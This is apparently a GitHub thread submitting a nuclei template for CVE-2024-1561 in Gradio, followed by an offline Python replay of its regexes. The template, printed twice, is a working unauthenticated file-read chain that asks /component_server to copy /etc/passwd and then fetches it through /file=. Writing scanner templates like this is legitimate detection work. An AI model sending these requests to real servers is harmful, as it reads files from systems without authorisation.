[nuclei-template] CVE-2024-1561 #9771
Check here for usage and output https://github.com/DiabloHTB/Nuclei-Template-CVE-2024-1561/tree/main

@DhiyaneshGeek I have an improvement to this for the regex part before this gets added:
```yaml
id: CVE-2024-1561

info:
  name: CVE-2024-1561
  author: Diablo
  description: |
    Local file read by calling arbitrary methods of Components class
  severity: HIGH
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read files on the server
  remediation: |
    Update to Gradio 4.13.0
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-1561
  reference:
    - https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338
    - https://github.com/DiabloHTB/CVE-2024-1561
    - https://nvd.nist.gov/vuln/detail/CVE-2024-1561
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1561
  metadata:
    max-request: 3 # three raw requests are sent below (/config, /component_server, /file=)
    vendor: Gradio
    product: https://github.com/gradio-app/gradio
  tags: cve,cve2024,intrusive,unauth,gradio,path-traversal

http:
  # Request 1: fetch the app config and pull the id of the first component
  - raw:
      - |
        GET /config HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: json
        name: first-component
        part: body
        group: 1
        json:
          - '.components[0].id'
        internal: true

  # Request 2: ask the component server for the temporary path; the regex keeps the
  # path only, without the surrounding double quotes of the response
  - raw:
      - |
        POST /component_server HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"component_id": "{{first-component}}",
        "data": "/etc/passwd",
        "fn_name": "move_resource_to_block_cache",
        "session_hash": "aaaaaaaaaaa"}

    extractors:
      - type: regex
        name: tmpath
        regex:
          - \/[a-zA-Z0-9\/]+
        internal: true

  # Request 3: read the file back via the extracted path and match a root entry
  - raw:
      - |
        GET /file={{tmpath}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0:"
        part: body
```
Hi @DiabloHTB, only this part below was updated, right?
@DhiyaneshGeek Hey there, that part and the last request changed from:

```yaml
id: CVE-2024-1561

info:
  name: CVE-2024-1561
  author: Diablo
  description: |
    Local file read by calling arbitrary methods of Components class
  severity: HIGH
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read files on the server
  remediation: |
    Update to Gradio 4.13.0
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-1561
  reference:
    - https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338
    - https://github.com/DiabloHTB/CVE-2024-1561
    - https://nvd.nist.gov/vuln/detail/CVE-2024-1561
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1561
  metadata:
    max-request: 3 # three raw requests are sent below (/config, /component_server, /file=)
    vendor: Gradio
    product: https://github.com/gradio-app/gradio
  tags: cve,cve2024,intrusive,unauth,gradio,path-traversal

http:
  # Request 1: fetch the app config and pull the id of the first component
  - raw:
      - |
        GET /config HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: json
        name: first-component
        part: body
        group: 1
        json:
          - '.components[0].id'
        internal: true

  # Request 2: ask the component server for the temporary path; the regex keeps the
  # path only, without the surrounding double quotes of the response
  - raw:
      - |
        POST /component_server HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"component_id": "{{first-component}}",
        "data": "/etc/passwd",
        "fn_name": "move_resource_to_block_cache",
        "session_hash": "aaaaaaaaaaa"}

    extractors:
      - type: regex
        name: tmpath
        regex:
          - \/[a-zA-Z0-9\/]+
        internal: true

  # Request 3: read the file back via the extracted path and match a root entry
  - raw:
      - |
        GET /file={{tmpath}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0:"
        part: body
# digest: 490a0046304402203c6137fea5301e4c6d68e46f20ce0a6c5a88919d747eecf8b4f4df9773d84845022031b061bfbc332f22390d9ea69831e2f94586cc49fd8a1b1419dd39c2a8dda8d1:9c69f0f6a1e1d9ed8dd8d3f14441892c
```
Hi @DiabloHTB, I'll update the PR #9800 from my side. You can grab your cool PD stickers over here http://nux.gg/stickers 😄 Thanks for sharing the updated template.
Template Information:

Local file read by calling arbitrary methods of Components class in Gradio 4.12.0. The template I created detects this by trying to get the /etc/passwd and matching with the word root, using three requests:

1. /config and extracting the id of the first component
2. /component_server and using the previously extracted id to get the temporary path of the /etc/passwd; the response is in double quotes, using regex to extract the hash inside it and using it in the next request.
   NOTE: This step can be improved by extracting the whole path without double quotes using regex, I couldn't find a way to do this.
3. tmpath to get the /etc/passwd using the already extracted hash, example "/tmp/gradio/{{tmpath}}passwd" and match with the word "root:[x*]:0:0:"

Gradio https://github.com/gradio-app/gradio

Full writeup and Python script to exploit: https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338

Sh PoC was created by me: https://github.com/DiabloHTB/CVE-2024-1561

Nuclei Template:

Example output:
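To make the three-step extractor/matcher chain discussed in this thread concrete, here is an added Python example; it is not part of the issue, of the author's PoC, or of the nuclei-templates project. It replays the `.components[0].id` json extractor, the improved `\/[a-zA-Z0-9\/]+` regex and the `root:[x*]:0:0:` matcher offline over constructed sample bodies (no network), and shows why the improved regex drops the double quotes but also where it stops short. The `version` key in the sample config, the `extract_quoted_path` alternative and the `is_patched` helper are my own assumptions, not something the thread states.

```python
import json
import re

# Constructed sample bodies standing in for the three replies the template chains
# together. They are NOT real Gradio output; only their shapes matter here.
CONFIG_BODY = json.dumps({
    "version": "4.12.0",  # assumption: /config exposes a version key
    "components": [{"id": 7, "type": "textbox"}, {"id": 9, "type": "button"}],
})
COMPONENT_SERVER_BODY = '"/tmp/gradio/0123abcd4567ef89/passwd"'  # quoted path, as the issue describes
FILE_BODY = "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"


# Request 1: the json extractor '.components[0].id' picks the id of the first component.
def first_component_id(config_body: str) -> int:
    return json.loads(config_body)["components"][0]["id"]


# Request 2: the improved regex from the thread. The match starts at the first '/', so the
# opening double quote is never part of tmpath, and it ends at the closing quote.
TMPATH_RE = re.compile(r"\/[a-zA-Z0-9\/]+")


def extract_tmpath(body: str):
    m = TMPATH_RE.search(body)
    return m.group(0) if m else None


# Caveat: the character class has no '.', '-' or '_', so a path containing one of them
# is cut short. Hypothetical alternative (not from the thread): everything between quotes.
QUOTED_RE = re.compile(r'"([^"]+)"')


def extract_quoted_path(body: str):
    m = QUOTED_RE.search(body)
    return m.group(1) if m else None


# Request 3: the matcher. '[x*]' is a character class, so it accepts 'root:x:0:0:'
# (shadowed password) and 'root:*:0:0:' (locked account), not the literal text 'x*'.
PASSWD_RE = re.compile(r"root:[x*]:0:0:")


def matches_passwd(body: str) -> bool:
    return PASSWD_RE.search(body) is not None


# Defender-side check derived from the remediation line: 4.13.0 or later is patched.
def is_patched(version: str) -> bool:
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        return False  # unparseable version: treat as unpatched so it gets looked at
    return tuple(int(x) for x in m.groups()) >= (4, 13, 0)


def run_chain(config_body: str, component_body: str, file_body: str) -> dict:
    """Replay the extractor/matcher chain offline on the given bodies."""
    cfg = json.loads(config_body)
    return {
        "component_id": first_component_id(config_body),
        "tmpath": extract_tmpath(component_body),
        "matched": matches_passwd(file_body),
        "patched": is_patched(cfg.get("version", "")),
    }


if __name__ == "__main__":
    print(run_chain(CONFIG_BODY, COMPONENT_SERVER_BODY, FILE_BODY))
```

Running the script prints the chain result for the constructed bodies. The point of `extract_quoted_path` is only to show the trade-off: the thread's regex is tight and never captures the quotes, while a quote-delimited capture survives paths with characters outside `[a-zA-Z0-9/]` at the cost of matching any quoted string in the body.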